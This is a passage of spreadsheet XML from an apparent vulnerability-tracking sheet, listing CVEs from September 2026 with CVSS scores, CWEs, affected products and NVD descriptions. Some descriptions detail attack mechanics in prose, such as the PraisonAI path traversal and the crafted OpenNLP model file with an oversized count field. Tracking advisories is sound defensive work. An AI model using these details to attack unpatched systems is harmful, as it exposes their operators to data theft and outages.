      </c>
      <c r="B600" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C600" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57119</t>
        </is>
      </c>
      <c r="D600" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E600" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F600" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G600" s="5" t="inlineStr"/>
      <c r="H600" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I600" s="5" t="inlineStr"/>
      <c r="J600" s="5" t="inlineStr"/>
      <c r="K600" s="5" t="inlineStr"/>
      <c r="L600" s="5" t="inlineStr"/>
      <c r="M600" s="5" t="inlineStr"/>
      <c r="N600" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O600" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P600" s="5" t="inlineStr"/>
      <c r="Q600" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R600" s="5" t="inlineStr">
        <is>
          <t>PraisonAI is a multi-agent teams system. Prior to 4.6.59, the unauthenticated Jobs API accepts an absolute or traversing agent_file path in POST /api/v1/runs and passes it to the job executor without a workspace allowlist or boundary check. A remote caller can cause the server to open files accessible to the service account, exposing credentials, keys, environment variables, and other local data. This vulnerability is fixed in 4.6.59.</t>
        </is>
      </c>
      <c r="S600" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57119</t>
        </is>
      </c>
    </row>
    <row r="601">
      <c r="A601" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B601" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C601" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63126</t>
        </is>
      </c>
      <c r="D601" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E601" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F601" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G601" s="5" t="inlineStr"/>
      <c r="H601" s="5" t="inlineStr"/>
      <c r="I601" s="5" t="inlineStr"/>
      <c r="J601" s="5" t="inlineStr"/>
      <c r="K601" s="5" t="inlineStr"/>
      <c r="L601" s="5" t="inlineStr"/>
      <c r="M601" s="5" t="inlineStr"/>
      <c r="N601" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O601" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P601" s="5" t="inlineStr"/>
      <c r="Q601" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R601" s="5" t="inlineStr">
        <is>
          <t>Wire provides gRPC and protocol buffers for Android, Kotlin, Swift, and Java. Prior to 6.4.5 and 7.0.0-alpha04, Wire protobuf readers do not consistently validate attacker-controlled lengths against the current logical message boundary before advancing cursors, pointers, limits, slices, or allocations. In Kotlin, ProtoAdapter.decode(ByteArray) and ProtoAdapter.decode(ByteString) use ByteArrayProtoReader32.internalNextLengthDelimited(), where a positive oversized length can wrap pos + length to a negative limit and escape the existing negative-length check. Related ProtoReader, ReadBuffer.readVarint(), ReadBuffer.verifyAdditional(count:), packed-repeated, nested-message, and ProtoDecoder.decodeSizeDelimited(_:from:) paths can cross logical boundaries, perform pointer arithmetic, reserve capacity, or convert an unrepresentable size before proving the requested bytes exist. An attacker who supplies malformed protobuf bytes can cause unchecked exceptions, traps, out-of-bounds behavior, or excessive allocation, resulting in denial of service without known confidentiality, integrity, or code-execution impact. This issue is fixed in versions 6.4.5 and 7.0.0-alpha04.</t>
        </is>
      </c>
      <c r="S601" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63126</t>
        </is>
      </c>
    </row>
    <row r="602">
      <c r="A602" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B602" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C602" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63128</t>
        </is>
      </c>
      <c r="D602" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E602" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F602" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G602" s="5" t="inlineStr"/>
      <c r="H602" s="5" t="inlineStr"/>
      <c r="I602" s="5" t="inlineStr"/>
      <c r="J602" s="5" t="inlineStr"/>
      <c r="K602" s="5" t="inlineStr"/>
      <c r="L602" s="5" t="inlineStr">
        <is>
          <t>rust:rmcp</t>
        </is>
      </c>
      <c r="M602" s="5" t="inlineStr">
        <is>
          <t>2.0.0</t>
        </is>
      </c>
      <c r="N602" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD</t>
        </is>
      </c>
      <c r="O602" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P602" s="5" t="inlineStr"/>
      <c r="Q602" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-401, CWE-772</t>
        </is>
      </c>
      <c r="R602" s="5" t="inlineStr">
        <is>
          <t>RMCP is an official Rust SDK for the Model Context Protocol. Prior to 2.0.0, the rmcp crate's stateful Streamable HTTP server in crates/rmcp/src/transport/streamable_http_server/tower.rs allows an unauthenticated client to send a well-formed JSON-RPC POST that is not an initialization request, or an initialization request with a mismatched protocol header, causing StreamableHttpService::handle_post to call LocalSessionManager.create_session before validating the message. An early validation failure returns without removing the inserted LocalSessionHandle from LocalSessionManager.sessions, permanently retaining session and channel state for the server process lifetime. Repeated requests can grow the shared session table without bound, degrade legitimate-client latency through lock contention, exhaust memory, and terminate the server. This issue is fixed in version 2.0.0.</t>
        </is>
      </c>
      <c r="S602" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63128</t>
        </is>
      </c>
    </row>
    <row r="603">
      <c r="A603" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B603" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C603" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-64761</t>
        </is>
      </c>
      <c r="D603" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E603" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F603" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G603" s="5" t="inlineStr"/>
      <c r="H603" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I603" s="5" t="inlineStr"/>
      <c r="J603" s="5" t="inlineStr"/>
      <c r="K603" s="5" t="inlineStr">
        <is>
          <t>apple:ipados, apple:iphone_os</t>
        </is>
      </c>
      <c r="L603" s="5" t="inlineStr"/>
      <c r="M603" s="5" t="inlineStr"/>
      <c r="N603" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O603" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P603" s="5" t="inlineStr"/>
      <c r="Q603" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="R603" s="5" t="inlineStr">
        <is>
          <t>A privacy issue was addressed with improved handling of user preferences. This issue is fixed in iOS 27 and iPadOS 27. An app may be able to identify what other apps a user has installed.</t>
        </is>
      </c>
      <c r="S603" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-64761</t>
        </is>
      </c>
    </row>
    <row r="604">
      <c r="A604" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B604" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C604" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65342</t>
        </is>
      </c>
      <c r="D604" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E604" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F604" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G604" s="5" t="inlineStr"/>
      <c r="H604" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I604" s="5" t="inlineStr"/>
      <c r="J604" s="5" t="inlineStr"/>
      <c r="K604" s="5" t="inlineStr">
        <is>
          <t>apple:macos</t>
        </is>
      </c>
      <c r="L604" s="5" t="inlineStr"/>
      <c r="M604" s="5" t="inlineStr"/>
      <c r="N604" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O604" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P604" s="5" t="inlineStr"/>
      <c r="Q604" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R604" s="5" t="inlineStr">
        <is>
          <t>A permissions issue was addressed with improved validation. This issue is fixed in macOS Golden Gate 27, macOS Sequoia 15.8, macOS Tahoe 26.7. An app may be able to access sensitive user data.</t>
        </is>
      </c>
      <c r="S604" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65342</t>
        </is>
      </c>
    </row>
    <row r="605">
      <c r="A605" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B605" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C605" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65378</t>
        </is>
      </c>
      <c r="D605" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E605" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F605" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G605" s="5" t="inlineStr"/>
      <c r="H605" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I605" s="5" t="inlineStr"/>
      <c r="J605" s="5" t="inlineStr"/>
      <c r="K605" s="5" t="inlineStr">
        <is>
          <t>apple:macos</t>
        </is>
      </c>
      <c r="L605" s="5" t="inlineStr"/>
      <c r="M605" s="5" t="inlineStr"/>
      <c r="N605" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O605" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P605" s="5" t="inlineStr"/>
      <c r="Q605" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R605" s="5" t="inlineStr">
        <is>
          <t>An authorization issue was addressed with improved state management. This issue is fixed in macOS Golden Gate 27, macOS Sequoia 15.8, macOS Tahoe 26.7. An app may be able to access sensitive user data.</t>
        </is>
      </c>
      <c r="S605" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65378</t>
        </is>
      </c>
    </row>
    <row r="606">
      <c r="A606" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B606" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C606" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65410</t>
        </is>
      </c>
      <c r="D606" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E606" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F606" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G606" s="5" t="inlineStr"/>
      <c r="H606" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I606" s="5" t="inlineStr"/>
      <c r="J606" s="5" t="inlineStr"/>
      <c r="K606" s="5" t="inlineStr">
        <is>
          <t>apple:ipados, apple:iphone_os, apple:macos, apple:tvos, apple:visionos, apple:watchos</t>
        </is>
      </c>
      <c r="L606" s="5" t="inlineStr"/>
      <c r="M606" s="5" t="inlineStr"/>
      <c r="N606" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O606" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P606" s="5" t="inlineStr"/>
      <c r="Q606" s="5" t="inlineStr">
        <is>
          <t>CWE-248, CWE-400</t>
        </is>
      </c>
      <c r="R606" s="5" t="inlineStr">
        <is>
          <t>The issue was addressed with improved checks. This issue is fixed in iOS 26.7 and iPadOS 26.7, iOS 27 and iPadOS 27, macOS Golden Gate 27, macOS Tahoe 26.7, tvOS 27, visionOS 27, watchOS 27. An app may be able to cause unexpected system termination.</t>
        </is>
      </c>
      <c r="S606" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65410</t>
        </is>
      </c>
    </row>
    <row r="607">
      <c r="A607" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B607" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C607" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66304</t>
        </is>
      </c>
      <c r="D607" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E607" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F607" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G607" s="5" t="inlineStr"/>
      <c r="H607" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I607" s="5" t="inlineStr"/>
      <c r="J607" s="5" t="inlineStr"/>
      <c r="K607" s="5" t="inlineStr">
        <is>
          <t>microsoft:skype_for_business_server, microsoft:skype_for_business_server_subscription_edition</t>
        </is>
      </c>
      <c r="L607" s="5" t="inlineStr"/>
      <c r="M607" s="5" t="inlineStr"/>
      <c r="N607" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O607" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P607" s="5" t="inlineStr"/>
      <c r="Q607" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R607" s="5" t="inlineStr">
        <is>
          <t>Server-side request forgery (ssrf) in Skype for Business allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="S607" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66304</t>
        </is>
      </c>
    </row>
    <row r="608">
      <c r="A608" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B608" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C608" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66307</t>
        </is>
      </c>
      <c r="D608" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E608" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F608" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G608" s="5" t="inlineStr"/>
      <c r="H608" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I608" s="5" t="inlineStr"/>
      <c r="J608" s="5" t="inlineStr"/>
      <c r="K608" s="5" t="inlineStr">
        <is>
          <t>microsoft:skype_for_business_server, microsoft:skype_for_business_server_subscription_edition</t>
        </is>
      </c>
      <c r="L608" s="5" t="inlineStr"/>
      <c r="M608" s="5" t="inlineStr"/>
      <c r="N608" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O608" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P608" s="5" t="inlineStr"/>
      <c r="Q608" s="5" t="inlineStr">
        <is>
          <t>CWE-191</t>
        </is>
      </c>
      <c r="R608" s="5" t="inlineStr">
        <is>
          <t>Integer underflow (wrap or wraparound) in Skype for Business allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="S608" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66307</t>
        </is>
      </c>
    </row>
    <row r="609">
      <c r="A609" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B609" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C609" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67211</t>
        </is>
      </c>
      <c r="D609" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E609" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F609" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G609" s="5" t="inlineStr"/>
      <c r="H609" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I609" s="5" t="inlineStr"/>
      <c r="J609" s="5" t="inlineStr"/>
      <c r="K609" s="5" t="inlineStr">
        <is>
          <t>apache:opennlp</t>
        </is>
      </c>
      <c r="L609" s="5" t="inlineStr"/>
      <c r="M609" s="5" t="inlineStr"/>
      <c r="N609" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O609" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P609" s="5" t="inlineStr"/>
      <c r="Q609" s="5" t="inlineStr">
        <is>
          <t>CWE-789</t>
        </is>
      </c>
      <c r="R609" s="5" t="inlineStr">
        <is>
          <t>OOM Denial of Service via Unbounded Map Pre-Sizing in Apache OpenNLP SymSpellModelSerializer
Versions Affected: 
- 3.0.0-M4
- 3.0.0-M5
(The opennlp-spellcheck extension was introduced in 3.0.0-M4. Releases 1.x and 2.x do not contain the affected code.)
Description:
The SymSpellModelSerializer.create() method reads two 32-bit signed integer count fields (unigramCount and bigramCount) from a binary SymSpell model stream and passes each value directly to LinkedHashMap.newLinkedHashMap() after validating only that it is non-negative. No upper bound is applied, so the count is fully attacker-controlled when the model file originates from an untrusted source.
A crafted .bin model file in which either count field is set to Integer.MAX_VALUE (or any value large enough to exhaust the available heap) causes the map to be pre-sized to a capacity of 2^30 entries. The oversized backing array is allocated on the first put() into that map, requesting 4–8 GB depending on whether compressed oops are in effect, and the load fails with an OutOfMemoryError. Because the count fields sit immediately after a fixed-size header (magic, format version, three UTF strings, the configuration fields, and the edit-distance identifier) the attacker pays no meaningful size cost to weaponize a payload: a file of well under 100 bytes plus a single real entry is sufficient to crash a JVM that loads it.
Any code path that deserializes a SymSpell model is affected, including SymSpellModels.deserialize(InputStream), SymSpellModels.fromBytes(byte[]), classpath model loading via SymSpellModelResolver.resolveByLanguage(String), the CorrectTextTool command-line tool, and model-archive loading through the registered ArtifactSerializer. The opennlp-spellcheck extension ships in the official OpenNLP binary distribution.
The practical impact is denial of service against processes that load SymSpell model files from untrusted or semi-trusted origins.
Mitigation:
- 3.x users should upgrade to 3.0.0-M6.
Note: The fix applies an upper bound to both count fields, checked before the map is pre-sized; counts that are negative or exceed the bound cause an IOException to be thrown and the read to fail fast with no large allocation. The bound is the existing AbstractModelReader.MAX_ENTRIES limit introduced earlie, which the current change promotes to public visibility so that serializers implementing their own binary format can share it. The default bound is 10,000,000, which is well above the entry counts of legitimate SymSpell dictionaries but far below any value that would threaten heap exhaustion. Deployments that legitimately need to load larger dictionaries can raise the limit at JVM startup by setting the OPENNLP_MAX_ENTRIES system property to the desired positive integer (e.g. -DOPENNLP_MAX_ENTRIES=50000000); invalid or non-positive values fall back to the default. Note that this property is shared with the model-reader limit and raising it relaxes both.
Users who cannot upgrade immediately should treat all SymSpell .bin model files as untrusted input unless their provenance is verified, and should avoid loading models supplied by end users or fetched from third-party repositories without integrity checks.</t>
        </is>
      </c>
      <c r="S609" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67211</t>
        </is>
      </c>
    </row>
    <row r="610">
      <c r="A610" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B610" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C610" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67376</t>
        </is>
      </c>
      <c r="D610" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E610" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F610" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G610" s="5" t="inlineStr"/>
      <c r="H610" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I610" s="5" t="inlineStr"/>
      <c r="J610" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K610" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L610" s="5" t="inlineStr"/>
      <c r="M610" s="5" t="inlineStr"/>
      <c r="N610" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O610" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P610" s="5" t="inlineStr"/>
      <c r="Q610" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R610" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in SQL Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="S610" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67376</t>
        </is>
      </c>
    </row>
    <row r="611">
      <c r="A611" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B611" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C611" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69852</t>
        </is>
      </c>
      <c r="D611" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E611" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F611" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G611" s="5" t="inlineStr"/>
      <c r="H611" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I611" s="5" t="inlineStr"/>
      <c r="J611" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K611"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611" s="5" t="inlineStr"/>
      <c r="M611" s="5" t="inlineStr"/>
      <c r="N611" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O611" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P611" s="5" t="inlineStr"/>
      <c r="Q611" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R611" s="5" t="inlineStr">
        <is>
          <t>Remote Code Execution in Windows Routing and Remote Access Service (RRAS) allows attacker to gain an unauthorized access to victim's machine</t>
        </is>
      </c>
      <c r="S611" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69852</t>
        </is>
      </c>
    </row>
    <row r="612">
      <c r="A612" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B612" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C612" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69881</t>
        </is>
      </c>
      <c r="D612" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E612" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F612" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G612" s="5" t="inlineStr"/>
      <c r="H612" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="I612" s="5" t="inlineStr"/>
      <c r="J612" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K612" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1809, microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L612" s="5" t="inlineStr"/>
      <c r="M612" s="5" t="inlineStr"/>
      <c r="N612" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O612" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P612" s="5" t="inlineStr"/>
      <c r="Q612" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="R612" s="5" t="inlineStr">
        <is>
          <t>Null pointer dereference in Windows IKE Extension allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="S612" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69881</t>
        </is>
      </c>
    </row>
    <row r="613">
      <c r="A613" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B613" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C613" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69890</t>
        </is>
      </c>
      <c r="D613" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E613" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F613" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G613" s="5" t="inlineStr"/>
      <c r="H613" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I613" s="5" t="inlineStr"/>
      <c r="J613" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K613" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1809, microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L613" s="5" t="inlineStr"/>
      <c r="M613" s="5" t="inlineStr"/>
      <c r="N613" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O613" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P613" s="5" t="inlineStr"/>
      <c r="Q613" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R613" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Virtual Trusted Platform Module allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S613" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69890</t>
        </is>
      </c>
    </row>
    <row r="614">
      <c r="A614" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B614" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C614" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71330</t>
        </is>
      </c>
      <c r="D614" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E614" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F614" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G614" s="5" t="inlineStr"/>
      <c r="H614" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I614" s="5" t="inlineStr"/>
      <c r="J614" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K614"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614" s="5" t="inlineStr"/>
      <c r="M614" s="5" t="inlineStr"/>
      <c r="N614" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O614" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P614" s="5" t="inlineStr"/>
      <c r="Q614" s="5" t="inlineStr">
        <is>
          <t>CWE-497</t>
        </is>
      </c>
      <c r="R614" s="5" t="inlineStr">
        <is>
          <t>Exposure of sensitive system information to an unauthorized control sphere in Windows Services for NFS ONCRPC XDR Driver allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="S614" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71330</t>
        </is>
      </c>
    </row>
    <row r="615">
      <c r="A615" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B615" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C615" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72928</t>
